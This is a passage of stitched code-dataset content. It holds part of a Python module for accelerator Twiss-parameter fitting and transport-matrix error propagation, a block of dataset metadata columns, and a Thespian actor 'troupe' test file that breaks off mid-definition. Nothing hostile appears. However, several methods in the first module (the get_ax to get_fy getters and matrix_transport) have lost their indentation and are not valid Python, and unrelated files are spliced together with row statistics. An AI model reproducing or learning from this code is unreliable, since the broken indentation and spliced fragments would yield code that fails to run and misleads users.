            # wrap-around pair: partner signal is shifted by one turn
            q2 = x[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
        if sigma_x is not None:
            s1, s2 = sigma_x[i].cpu().numpy(), sigma_x[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
        else:
            s1, s2 = level, level
        m11 = transport[i, 0, 0].cpu().numpy()
        m12 = transport[i, 0, 1].cpu().numpy()
        alpha, beta = ax[i], bx[i]
        # robust initial guess for the action: median of the invariant over turns
        action = numpy.median(1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2))
        # broadcast transport elements so every ODR observation has the same (m11, m12)
        m11 = m11*numpy.ones(n)
        m12 = m12*numpy.ones(n)
        X = numpy.array([q1, q2, m11, m12])
        # tiny sy makes the implicit constraint effectively exact
        data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
        model = odr.Model(ellipse, implicit=True)
        fit = odr.ODR(data, model, beta0=[alpha, beta, action], **kwargs).run()
        alpha, beta, action = fit.beta
        sigma_alpha, sigma_beta, sigma_action = fit.sd_beta
        value_jx.append(action)
        value_ax.append(alpha)
        value_bx.append(beta)
        error_jx.append(sigma_action)
        error_ax.append(sigma_alpha)
        error_bx.append(sigma_beta)
        # y plane: same procedure with the (2, 2)/(2, 3) transport elements
        q1 = y[i, :n].cpu().numpy()
        q2 = y[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
        if i + 1 == self.model.monitor_count:
            q2 = y[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
        if sigma_y is not None:
            s1, s2 = sigma_y[i].cpu().numpy(), sigma_y[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
        else:
            s1, s2 = level, level
        m11 = transport[i, 2, 2].cpu().numpy()
        m12 = transport[i, 2, 3].cpu().numpy()
        alpha, beta = ay[i], by[i]
        action = numpy.median(1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2))
        m11 = m11*numpy.ones(n)
        m12 = m12*numpy.ones(n)
        X = numpy.array([q1, q2, m11, m12])
        data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
        model = odr.Model(ellipse, implicit=True)
        fit = odr.ODR(data, model, beta0=[alpha, beta, action], **kwargs).run()
        alpha, beta, action = fit.beta
        sigma_alpha, sigma_beta, sigma_action = fit.sd_beta
        value_jy.append(action)
        value_ay.append(alpha)
        value_by.append(beta)
        error_jy.append(sigma_action)
        error_ay.append(sigma_alpha)
        error_by.append(sigma_beta)
    result = {}
    # placeholders, overwritten below once the weighted centers/spreads are known
    result['center_jx'] = None
    result['spread_jx'] = None
    result['center_jy'] = None
    result['spread_jy'] = None
    # factor 0.5: fitted 'action' is twice the action invariant J
    result['jx'] = 0.5*torch.tensor(value_jx, dtype=self.dtype, device=self.device)
    result['ax'] = torch.tensor(value_ax, dtype=self.dtype, device=self.device)
    result['bx'] = torch.tensor(value_bx, dtype=self.dtype, device=self.device)
    result['sigma_jx'] = 0.5*torch.tensor(error_jx, dtype=self.dtype, device=self.device)
    result['sigma_ax'] = torch.tensor(error_ax, dtype=self.dtype, device=self.device)
    result['sigma_bx'] = torch.tensor(error_bx, dtype=self.dtype, device=self.device)
    result['jy'] = 0.5*torch.tensor(value_jy, dtype=self.dtype, device=self.device)
    result['ay'] = torch.tensor(value_ay, dtype=self.dtype, device=self.device)
    result['by'] = torch.tensor(value_by, dtype=self.dtype, device=self.device)
    result['sigma_jy'] = 0.5*torch.tensor(error_jy, dtype=self.dtype, device=self.device)
    result['sigma_ay'] = torch.tensor(error_ay, dtype=self.dtype, device=self.device)
    result['sigma_by'] = torch.tensor(error_by, dtype=self.dtype, device=self.device)
    factor = torch.tensor(factor, dtype=self.dtype, device=self.device)
    # robust outlier mask on the actions, then weight surviving values by inverse relative variance
    mask_jx = threshold(standardize(result['jx'], center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
    mask_jx = mask_jx.squeeze()/(result['sigma_jx']/result['sigma_jx'].sum())**2
    center_jx = weighted_mean(result['jx'], weight=mask_jx)
    spread_jx = weighted_variance(result['jx'], weight=mask_jx, center=center_jx).sqrt()
    mask_jy = threshold(standardize(result['jy'], center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
    mask_jy = mask_jy.squeeze()/(result['sigma_jy']/result['sigma_jy'].sum())**2
    center_jy = weighted_mean(result['jy'], weight=mask_jy)
    spread_jy = weighted_variance(result['jy'], weight=mask_jy, center=center_jy).sqrt()
    result['center_jx'] = center_jx
    result['spread_jx'] = spread_jx
    result['center_jy'] = center_jy
    result['spread_jy'] = spread_jy
    # phase advances between adjacent monitors from the fitted twiss
    advance = []
    for i in range(self.model.monitor_count):
        normal = self.model.cs_normal(result['ax'][i], result['bx'][i], result['ay'][i], result['by'][i])
        values, _ = self.model.advance_twiss(normal, transport[i])
        advance.append(values)
    advance = torch.stack(advance).T
    result['mux'], result['muy'] = advance
    if not refit:
        return result
    # refit pass: fix the action to the weighted center and fit only (alpha, beta);
    # NOTE this closure reads 'action' from the enclosing scope at call time —
    # it is rebound per plane inside the loop below before each fit
    def ellipse(w, x):
        alpha, beta = w
        q1, q2, m11, m12 = x
        return 1/beta*(q1**2 + (alpha*q1 + beta*(q2 - q1*m11)/m12)**2) - action
    value_ax, error_ax = [], []
    value_ay, error_ay = [], []
    value_bx, error_bx = [], []
    value_by, error_by = [], []
    for i in range(self.model.monitor_count):
        # x plane with action fixed to 2*center_jx
        action = 2.0*center_jx.cpu().numpy()
        q1 = x[i, :n].cpu().numpy()
        q2 = x[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
        if i + 1 == self.model.monitor_count:
            q2 = x[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
        if sigma_x is not None:
            s1, s2 = sigma_x[i].cpu().numpy(), sigma_x[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
        else:
            s1, s2 = level, level
        m11 = transport[i, 0, 0].cpu().numpy()
        m12 = transport[i, 0, 1].cpu().numpy()
        # start the refit from the first-pass twiss values
        alpha, beta = result['ax'][i].cpu().numpy(), result['bx'][i].cpu().numpy()
        m11 = m11*numpy.ones(n)
        m12 = m12*numpy.ones(n)
        X = numpy.array([q1, q2, m11, m12])
        data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
        model = odr.Model(ellipse, implicit=True)
        fit = odr.ODR(data, model, beta0=[alpha, beta], **kwargs).run()
        alpha, beta = fit.beta
        sigma_alpha, sigma_beta = fit.sd_beta
        value_ax.append(alpha)
        value_bx.append(beta)
        error_ax.append(sigma_alpha)
        error_bx.append(sigma_beta)
        # y plane with action fixed to 2*center_jy
        action = 2.0*center_jy.cpu().numpy()
        q1 = y[i, :n].cpu().numpy()
        q2 = y[int(mod(i + 1, self.model.monitor_count)), :n].cpu().numpy()
        if i + 1 == self.model.monitor_count:
            q2 = y[int(mod(i + 1, self.model.monitor_count)), 1:n+1].cpu().numpy()
        if sigma_y is not None:
            s1, s2 = sigma_y[i].cpu().numpy(), sigma_y[int(mod(i + 1, self.model.monitor_count))].cpu().numpy()
        else:
            s1, s2 = level, level
        m11 = transport[i, 2, 2].cpu().numpy()
        m12 = transport[i, 2, 3].cpu().numpy()
        alpha, beta = result['ay'][i].cpu().numpy(), result['by'][i].cpu().numpy()
        m11 = m11*numpy.ones(n)
        m12 = m12*numpy.ones(n)
        X = numpy.array([q1, q2, m11, m12])
        data = odr.RealData(X, y=1, sx=[s1, s2, level, level], sy=1.0E-16)
        model = odr.Model(ellipse, implicit=True)
        fit = odr.ODR(data, model, beta0=[alpha, beta], **kwargs).run()
        alpha, beta = fit.beta
        sigma_alpha, sigma_beta = fit.sd_beta
        value_ay.append(alpha)
        value_by.append(beta)
        error_ay.append(sigma_alpha)
        error_by.append(sigma_beta)
    # overwrite first-pass twiss with the refitted values (actions are kept)
    result['ax'] = torch.tensor(value_ax, dtype=self.dtype, device=self.device)
    result['bx'] = torch.tensor(value_bx, dtype=self.dtype, device=self.device)
    result['sigma_ax'] = torch.tensor(error_ax, dtype=self.dtype, device=self.device)
    result['sigma_bx'] = torch.tensor(error_bx, dtype=self.dtype, device=self.device)
    result['ay'] = torch.tensor(value_ay, dtype=self.dtype, device=self.device)
    result['by'] = torch.tensor(value_by, dtype=self.dtype, device=self.device)
    result['sigma_ay'] = torch.tensor(error_ay, dtype=self.dtype, device=self.device)
    result['sigma_by'] = torch.tensor(error_by, dtype=self.dtype, device=self.device)
    # recompute phase advances from the refitted twiss
    advance = []
    for i in range(self.model.monitor_count):
        normal = self.model.cs_normal(result['ax'][i], result['bx'][i], result['ay'][i], result['by'][i])
        values, _ = self.model.advance_twiss(normal, transport[i])
        advance.append(values)
    advance = torch.stack(advance).T
    result['mux'], result['muy'] = advance
    return result
def get_ax(self, index:int) -> torch.Tensor:
"""
Get ax value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[ax, sigma_ax] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_ax(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.ax[index], self.sigma_ax[index]])
def get_bx(self, index:int) -> torch.Tensor:
"""
Get bx value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[bx, sigma_bx] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_bx(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.bx[index], self.sigma_bx[index]])
def get_fx(self, index:int) -> torch.Tensor:
"""
Get fx value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[fx, sigma_fx] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_fx(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.fx[index], self.sigma_fx[index]])
def get_ay(self, index:int) -> torch.Tensor:
"""
Get ay value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[ay, sigma_ay] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_ay(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.ay[index], self.sigma_ay[index]])
def get_by(self, index:int) -> torch.Tensor:
"""
Get by value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[by, sigma_by] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_by(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.by[index], self.sigma_by[index]])
def get_fy(self, index:int) -> torch.Tensor:
"""
Get fy value and error at given index.
Parameters
----------
index: int
index or location name
Returns
-------
[fy, sigma_fy] (torch.Tensor)
"""
if isinstance(index, str) and index in self.model.name:
return self.get_fy(self.model.get_index(index))
index = int(mod(index, self.size))
return torch.stack([self.fy[index], self.sigma_fy[index]])
def get_twiss(self, index:int) -> dict:
    """
    Return twiss data at given index.

    Parameters
    ----------
    index: int
        index or location name

    Returns
    -------
    twiss data (dict)
    """
    if isinstance(index, str) and index in self.model.name:
        return self.get_twiss(self.model.get_index(index))
    table = {}
    getters = (('ax', self.get_ax), ('bx', self.get_bx), ('fx', self.get_fx),
               ('ay', self.get_ay), ('by', self.get_by), ('fy', self.get_fy))
    for key, getter in getters:
        table[key], table[f'sigma_{key}'] = getter(index)
    return table
def get_table(self) -> pandas.DataFrame:
    """
    Return twiss data at all locations as dataframe.

    Parameters
    ----------
    None

    Returns
    -------
    twiss data (pandas.DataFrame)
    """
    frame = pandas.DataFrame()
    frame['name'] = self.model.name
    frame['kind'] = self.model.kind
    frame['flag'] = self.flag.cpu().numpy()
    frame['time'] = self.model.time.cpu().numpy()
    # value and error columns, plane by plane
    for key in ('ax', 'bx', 'fx', 'ay', 'by', 'fy'):
        frame[key] = getattr(self, key).cpu().numpy()
        frame[f'sigma_{key}'] = getattr(self, f'sigma_{key}').cpu().numpy()
    return frame
def __repr__(self) -> str:
    """
    String representation.
    """
    # shows the constructor-style summary: class name plus model, table and limit
    return f'{self.__class__.__name__}({self.model}, {self.table}, {self.limit})'
def __len__(self) -> int:
    """
    Number of locations.
    """
    # self.size is also used as the modulus for index wrap-around in the getters
    return self.size
def __call__(self, limit:int=None) -> pandas.DataFrame:
    """
    Perform twiss loop with default parameters.

    Parameters
    ----------
    limit: int
        range limit for virtual phase computation (defaults to max(self.limit))

    Returns
    -------
    twiss table (pandas.DataFrame)
    """
    if limit is None:
        limit = max(self.limit)
    self.get_action()
    self.get_twiss_from_amplitude()
    self.phase_virtual(limit=limit)
    self.get_twiss_from_phase()
    # filter configuration: which checks to apply and their thresholds
    select = {
        'phase': {'use': True, 'threshold': 10.00},
        'model': {'use': False, 'threshold': 00.50},
        'value': {'use': False, 'threshold': 00.50},
        'sigma': {'use': False, 'threshold': 00.25},
        'limit': {'use': True, 'threshold': 05.00}
    }
    # keep the original ordering: both masks are computed before any processing
    masks = {plane: self.filter_twiss(plane=plane, **select) for plane in ('x', 'y')}
    for plane in ('x', 'y'):
        self.process_twiss(plane=plane, mask=masks[plane], weight=True)
    return self.get_table()
def matrix(self, probe:torch.Tensor, other:torch.Tensor) -> tuple:
    """
    Generate uncoupled transport matrix (or matrices) for given locations.

    Matrices are generated from probe to other.
    One-turn matrices are generated where probe == other.
    Input parameters should be 1D tensors with matching length.
    Additionally probe and/or other input parameter can be an int or str in self.model.name (not checked).
    Note, twiss parameters are treated as independent variables in error propagation.

    Parameters
    ----------
    probe: torch.Tensor
        probe locations
    other: torch.Tensor
        other locations

    Returns
    -------
    uncoupled transport matrices and error matrices (tuple)
    """
    if isinstance(probe, int):
        probe = torch.tensor([probe], dtype=torch.int64, device=self.device)
    if isinstance(probe, str):
        probe = torch.tensor([self.model.name.index(probe)], dtype=torch.int64, device=self.device)
    if isinstance(other, int):
        other = torch.tensor([other], dtype=torch.int64, device=self.device)
    if isinstance(other, str):
        other = torch.tensor([self.model.name.index(other)], dtype=torch.int64, device=self.device)
    # shift coincident locations by one turn; torch.where avoids the in-place
    # mutation of the caller's tensor that `other[probe == other] += self.size` caused
    other = torch.where(probe == other, other + self.size, other)
    # phase advances (and their errors) between the requested locations
    fx, sigma_fx = Decomposition.phase_advance(probe, other, self.table.nux, self.fx, error=True, sigma_frequency=self.table.sigma_nux, sigma_phase=self.sigma_fx)
    fy, sigma_fy = Decomposition.phase_advance(probe, other, self.table.nuy, self.fy, error=True, sigma_frequency=self.table.sigma_nuy, sigma_phase=self.sigma_fy)
    probe = mod(probe, self.size).to(torch.int64)
    other = mod(other, self.size).to(torch.int64)
    transport = self.model.matrix_uncoupled(self.ax[probe], self.bx[probe], self.ax[other], self.bx[other], fx, self.ay[probe], self.by[probe], self.ay[other], self.by[other], fy)
    # first-order error propagation: accumulate variance contributions per element,
    # then take the square root at the end
    sigma_transport = torch.zeros_like(transport)
    sigma_transport[:, 0, 0] += self.sigma_ax[probe]**2*self.bx[other]*torch.sin(fx)**2/self.bx[probe]
    sigma_transport[:, 0, 0] += self.sigma_bx[probe]**2*self.bx[other]*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(4.0*self.bx[probe]**3)
    sigma_transport[:, 0, 0] += self.sigma_bx[other]**2*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other])
    sigma_transport[:, 0, 0] += sigma_fx**2*self.bx[other]*(-self.ax[probe]*torch.cos(fx) + torch.sin(fx))**2/self.bx[probe]
    sigma_transport[:, 0, 1] += self.sigma_bx[probe]**2*self.bx[other]*torch.sin(fx)**2/(4.0*self.bx[probe])
    sigma_transport[:, 0, 1] += self.sigma_bx[other]**2*self.bx[probe]*torch.sin(fx)**2/(4.0*self.bx[other])
    sigma_transport[:, 0, 1] += sigma_fx**2*self.bx[probe]*self.bx[other]*torch.cos(fx)**2
    sigma_transport[:, 1, 0] += self.sigma_ax[probe]**2*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
    sigma_transport[:, 1, 0] += self.sigma_ax[other]**2*(torch.cos(fx) + self.ax[probe]*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
    sigma_transport[:, 1, 0] += self.sigma_bx[probe]**2*((-self.ax[probe] + self.ax[other])*torch.cos(fx) + (1.0 + self.ax[probe]*self.ax[other])*torch.sin(fx))**2/(4.0*self.bx[probe]**3*self.bx[other])
    sigma_transport[:, 1, 0] += self.sigma_bx[other]**2*((-self.ax[probe] + self.ax[other])*torch.cos(fx) + (1.0 + self.ax[probe]*self.ax[other])*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other]**3)
    sigma_transport[:, 1, 0] += sigma_fx**2*((1.0 + self.ax[probe]*self.ax[other])*torch.cos(fx) + (self.ax[probe] - self.ax[other])*torch.sin(fx))**2/(self.bx[probe]*self.bx[other])
    sigma_transport[:, 1, 1] += self.sigma_bx[probe]**2*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(4.0*self.bx[probe]*self.bx[other])
    sigma_transport[:, 1, 1] += self.sigma_ax[other]**2*self.bx[probe]*torch.sin(fx)**2/self.bx[other]
    sigma_transport[:, 1, 1] += self.sigma_bx[other]**2*self.bx[probe]*(torch.cos(fx) - self.ax[other]*torch.sin(fx))**2/(4.0*self.bx[other]**3)
    sigma_transport[:, 1, 1] += sigma_fx**2*self.bx[probe]*(self.ax[other]*torch.cos(fx) + torch.sin(fx))**2/self.bx[other]
    sigma_transport[:, 2, 2] += self.sigma_ay[probe]**2*self.by[other]*torch.sin(fy)**2/self.by[probe]
    sigma_transport[:, 2, 2] += self.sigma_by[probe]**2*self.by[other]*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(4.0*self.by[probe]**3)
    sigma_transport[:, 2, 2] += self.sigma_by[other]**2*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other])
    sigma_transport[:, 2, 2] += sigma_fy**2*self.by[other]*(-self.ay[probe]*torch.cos(fy) + torch.sin(fy))**2/self.by[probe]
    sigma_transport[:, 2, 3] += self.sigma_by[probe]**2*self.by[other]*torch.sin(fy)**2/(4.0*self.by[probe])
    sigma_transport[:, 2, 3] += self.sigma_by[other]**2*self.by[probe]*torch.sin(fy)**2/(4.0*self.by[other])
    sigma_transport[:, 2, 3] += sigma_fy**2*self.by[probe]*self.by[other]*torch.cos(fy)**2
    sigma_transport[:, 3, 2] += self.sigma_ay[probe]**2*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(self.by[probe]*self.by[other])
    sigma_transport[:, 3, 2] += self.sigma_ay[other]**2*(torch.cos(fy) + self.ay[probe]*torch.sin(fy))**2/(self.by[probe]*self.by[other])
    sigma_transport[:, 3, 2] += self.sigma_by[probe]**2*((-self.ay[probe] + self.ay[other])*torch.cos(fy) + (1.0 + self.ay[probe]*self.ay[other])*torch.sin(fy))**2/(4.0*self.by[probe]**3*self.by[other])
    sigma_transport[:, 3, 2] += self.sigma_by[other]**2*((-self.ay[probe] + self.ay[other])*torch.cos(fy) + (1.0 + self.ay[probe]*self.ay[other])*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other]**3)
    sigma_transport[:, 3, 2] += sigma_fy**2*((1.0 + self.ay[probe]*self.ay[other])*torch.cos(fy) + (self.ay[probe] - self.ay[other])*torch.sin(fy))**2/(self.by[probe]*self.by[other])
    sigma_transport[:, 3, 3] += self.sigma_by[probe]**2*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(4.0*self.by[probe]*self.by[other])
    sigma_transport[:, 3, 3] += self.sigma_ay[other]**2*self.by[probe]*torch.sin(fy)**2/self.by[other]
    sigma_transport[:, 3, 3] += self.sigma_by[other]**2*self.by[probe]*(torch.cos(fy) - self.ay[other]*torch.sin(fy))**2/(4.0*self.by[other]**3)
    sigma_transport[:, 3, 3] += sigma_fy**2*self.by[probe]*(self.ay[other]*torch.cos(fy) + torch.sin(fy))**2/self.by[other]
    sigma_transport.sqrt_()
    return (transport.squeeze(), sigma_transport.squeeze())
def make_transport(self) -> None:
    """
    Set transport matrices between adjacent locations.

    self.transport[i] is a transport matrix from i to i + 1.

    Parameters
    ----------
    None

    Returns
    -------
    None
    """
    locations = torch.arange(self.size, dtype=torch.int64, device=self.device)
    self.transport, _ = self.matrix(locations, locations + 1)
def matrix_transport(self, probe:int, other:int) -> torch.Tensor:
"""
Generate transport matrix from probe to other using self.transport.
Parameters
----------
probe: int
probe location
other: int
other location
Returns
-------
transport matrix (torch.Tensor)
"""
if isinstance(probe, str):
probe = self.name.index(probe)
if isinstance(other, str):
other = self.name.index(other)
if probe < other:
matrix = self.transport[probe]
for i in range(probe + 1, other):
matrix = self.transport[int(mod(i, self.size))] @ matrix
return matrix
if probe > other:
matrix = self.transport[other]
for i in range(other + 1, probe):
matrix = self.transport[int(mod(i, self.size))] @ matrix
return torch.inverse(matrix)
def normal(self, probe:torch.Tensor) -> tuple:
    """
    Generate uncoupled normal matrix (or matrices) for given locations.

    Note, twiss parameters are treated as independent variables in error propagation.

    Parameters
    ----------
    probe: torch.Tensor
        probe locations (tensor of indices, int or str name)

    Returns
    -------
    uncoupled normal matrices and error matrices (tuple)
    """
    if isinstance(probe, int):
        probe = torch.tensor([probe], dtype=torch.int64, device=self.device)
    if isinstance(probe, str):
        probe = torch.tensor([self.model.name.index(probe)], dtype=torch.int64, device=self.device)
    probe = mod(probe, self.size).to(torch.int64)
    matrix = torch.zeros((len(probe), 4, 4), dtype=self.dtype, device=self.device)
    sigma_matrix = torch.zeros_like(matrix)
    # courant-snyder normalization matrix per plane:
    # [[sqrt(b), 0], [-a/sqrt(b), 1/sqrt(b)]]
    matrix[:, 0, 0] = self.bx[probe].sqrt()
    matrix[:, 1, 0] = -self.ax[probe]/self.bx[probe].sqrt()
    matrix[:, 1, 1] = 1.0/self.bx[probe].sqrt()
    matrix[:, 2, 2] = self.by[probe].sqrt()
    matrix[:, 3, 2] = -self.ay[probe]/self.by[probe].sqrt()
    matrix[:, 3, 3] = 1.0/self.by[probe].sqrt()
    # first-order error propagation; the (1, 0)/(3, 2) beta terms use the squared
    # derivative d(-a/sqrt(b))/db = a/(2 b^{3/2}), i.e. a**2/(4 b**3) — the original
    # code dropped the square on ax/ay
    sigma_matrix[:, 0, 0] += self.sigma_bx[probe]**2/(4.0*self.bx[probe])
    sigma_matrix[:, 1, 0] += self.sigma_ax[probe]**2/self.bx[probe] + self.sigma_bx[probe]**2*self.ax[probe]**2/(4.0*self.bx[probe]**3)
    sigma_matrix[:, 1, 1] += self.sigma_bx[probe]**2/(4.0*self.bx[probe]**3)
    sigma_matrix[:, 2, 2] += self.sigma_by[probe]**2/(4.0*self.by[probe])
    sigma_matrix[:, 3, 2] += self.sigma_ay[probe]**2/self.by[probe] + self.sigma_by[probe]**2*self.ay[probe]**2/(4.0*self.by[probe]**3)
    sigma_matrix[:, 3, 3] += self.sigma_by[probe]**2/(4.0*self.by[probe]**3)
    return (matrix.squeeze(), sigma_matrix.sqrt().squeeze())
def main():
    # placeholder entry point — this module is intended to be imported, not executed
    pass

if __name__ == '__main__':
    main()
| 42.360933
| 357
| 0.595218
| 10,539
| 72,649
| 3.936142
| 0.033969
| 0.051708
| 0.018176
| 0.010607
| 0.752164
| 0.697274
| 0.652942
| 0.613553
| 0.57749
| 0.548803
| 0
| 0.018076
| 0.261366
| 72,649
| 1,715
| 358
| 42.360933
| 0.75498
| 0.230987
| 0
| 0.388462
| 0
| 0.003846
| 0.03575
| 0.001713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0.001282
| 0.014103
| 0.005128
| 0.112821
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b44aa1e89f954d4739decd6c84438a72e8d03d
| 5,445
|
py
|
Python
|
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
import time
import datetime
from thespian.test import *
from thespian.actors import *
from thespian.troupe import troupe
max_listen_wait = datetime.timedelta(seconds=4)
max_ask_wait = datetime.timedelta(seconds=2.5)
class Bee(Actor):
    """Worker actor: sleeps for msg[0] seconds, then replies with msg[1] + ' buzz'."""
    def receiveMessage(self, msg, sender):
        if not isinstance(msg, tuple):
            return
        delay, word = msg
        time.sleep(delay)
        self.send(sender, word + ' buzz')
@troupe()
class Hive(Bee):
    # Bee scaled out as a troupe: same per-message behavior, handled by worker actors
    pass
@troupe()
class Colony(ActorTypeDispatcher):
    """Troupe that delegates tuple work to an internal Hive and relays string replies."""
    def receiveMsg_tuple(self, msg, sender):
        try:
            hive = self.hive
        except AttributeError:
            # first message: lazily create the inner Hive and the reply queue
            hive = self.hive = self.createActor(Hive)
            self.asker = []
        self.asker.append(sender)
        self.send(hive, msg)
        self.troupe_work_in_progress = True
    def receiveMsg_str(self, msg, sender):
        self.send(self.asker.pop(), msg)
        # stay marked busy while replies are still owed
        self.troupe_work_in_progress = bool(getattr(self, 'asker', False))
# Ensure there are more test data elements than workers so that
# some workers get multiple messages
# Each entry is (sleep seconds, reply word): four slow items plus 24 fast ones
testdata = [(0.5, 'Fizz'), (1, 'Honey'),
            (0.25, 'Flower'), (0.75, 'Pollen'),
            ] + ([(0.005, 'Orchid'), (0.005, 'Rose'),
                  (0.005, 'Carnation'), (0.005, 'Lily'),
                  (0.005, 'Daffodil'), (0.005, 'Begonia'),
                  (0.005, 'Violet'), (0.005, 'Aster'),
                  ] * 3)
def useActorForTest(asys, bee):
    """Send testdata to *bee* and verify every expected '... buzz' reply arrives."""
    # Run multiple passes to allow workers to be reaped between passes
    for attempt in range(2):
        print(attempt)
        for item in testdata:
            asys.tell(bee, item)
        pending = list(testdata)
        for _ in testdata:
            rsp = asys.listen(max_listen_wait)
            assert rsp
            print(str(rsp))
            pending = [entry for entry in pending
                       if not rsp.startswith(entry[1])]
        assert not pending
    asys.tell(bee, ActorExitRequest())
def testSingleBee(asys):
    # baseline: a single plain Bee must handle the full workload
    useActorForTest(asys, asys.createActor(Bee))
def testHive(asys):
    # same workload against the troupe'd Bee subclass
    useActorForTest(asys, asys.createActor(Hive))
def testColony(asys):
    # same workload against the two-level troupe (Colony delegating to Hive)
    useActorForTest(asys, asys.createActor(Colony))
# ------------------------------------------------------------
class SimpleSourceAuthority(ActorTypeDispatcher):
    """Source authority that approves every loaded source without inspection."""
    def receiveMsg_str(self, msg, sender):
        self.registerSourceAuthority()
        self.send(sender, 'ok')
    def receiveMsg_ValidateSource(self, msg, sender):
        approved = ValidatedSource(msg.sourceHash, msg.sourceData)
        self.send(sender, approved)
class LoadWatcher(ActorTypeDispatcher):
    """Forwards source load/unload notifications to whoever sent 'go'."""
    def receiveMsg_str(self, msg, sender):
        if msg == 'go':
            self.notifyOnSourceAvailability(True)
            self._tell = sender
            self.send(sender, 'ok')
        elif msg == 'stop':
            self.notifyOnSourceAvailability(False)
            self._tell = None
    def receiveMsg_LoadedSource(self, loadmsg, sender):
        target = getattr(self, '_tell', None)
        if target:
            self.send(target, loadmsg.sourceHash)
    def receiveMsg_UnloadedSource(self, unloadmsg, sender):
        target = getattr(self, '_tell', None)
        if target:
            self.send(target, ('unloaded', unloadmsg.sourceHash))
import tempfile, zipfile, os, shutil
@pytest.fixture()
def source_zip(request):
    # Build a temporary loadable-source zip containing a nested package
    # (forest.clearing.beehive) with troupe'd actors; the temp directory is
    # removed by the finalizer on teardown.
    tmpdir = tempfile.mkdtemp()
    zipfname = os.path.join(tmpdir, 'hivesrc.zip')
    hivezip = zipfile.ZipFile(zipfname, 'w')
    hivezip.writestr('__init__.py', '')
    hivezip.writestr('forest/__init__.py', '')
    hivezip.writestr('forest/clearing/__init__.py', '')
    # embedded module source: mirrors the Bee/Hive/Colony actors defined above
    hivezip.writestr('forest/clearing/beehive.py', '''
import time
from thespian.actors import *
from thespian.troupe import troupe
class Bee(Actor):
    def receiveMessage(self, msg, sender):
        if isinstance(msg, tuple):
            time.sleep(msg[0])
            self.send(sender, msg[1] + ' buzz')
@troupe()
class Hive(Bee): pass
@troupe()
class Colony(Bee):
    def receiveMessage(self, msg, sender):
        if isinstance(msg, tuple):
            if not hasattr(self, 'hive'):
                self.hive = self.createActor(Hive)
                self.asker = []
            self.asker.append(sender)
            self.send(self.hive, msg)
            self.troupe_work_in_progress = True
        elif isinstance(msg, str):
            self.send(self.asker.pop(), msg)
            self.troupe_work_in_progress = bool(self.asker)
''')
    hivezip.close()
    request.addfinalizer(lambda d=tmpdir:
                         os.path.exists(d) and shutil.rmtree(d))
    return zipfname
def _load_beehive_actor(asys, source_zip, actor_name):
    """Register the source authority and watcher, load the zip source, and
    create *actor_name* from the loaded source (shared by the tests below)."""
    r = asys.ask(asys.createActor(SimpleSourceAuthority), 'go', max_ask_wait)
    assert r == 'ok'
    r = asys.ask(asys.createActor(LoadWatcher), 'go', max_ask_wait)
    assert r == 'ok'
    srchash = asys.loadActorSource(source_zip)
    # wait for the LoadWatcher to confirm the source was loaded
    r = asys.listen(max_listen_wait)
    assert r == srchash
    return asys.createActor(actor_name, sourceHash=srchash)

def testLoadableHive(asys, source_zip):
